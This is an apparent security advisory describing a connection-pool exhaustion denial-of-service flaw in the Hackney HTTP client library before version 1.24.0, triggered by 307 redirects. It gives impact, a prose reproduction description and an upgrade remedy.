Hackney Connection Pool Exhaustion Vulnerability After 307 Redirects
Vulnerability
A denial-of-service vulnerability has been identified in the Hackney HTTP client library, all versions prior to 1.24.0. The issue arises because Hackney does not properly release HTTP connections back to the pool after processing 307 Temporary Redirect responses. This flaw can be exploited by remote attackers to deplete connection pools, leading to application slowdowns or timeouts.
Impact
Exploitation of this vulnerability can cause connection pools to become exhausted, resulting in application timeouts while waiting for a free connection.
Reproduction
The vulnerability can be reproduced by sending a POST request that receives a 307 Temporary Redirect response. This can be done using the Hackney library in an Elixir application. The connection pool will fill up with in-use connections, and once the maximum pool size is reached, subsequent requests will timeout waiting for a connection to become available.
Remediation
Users can upgrade to Hackney version 1.24.0 or later to address this vulnerability.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.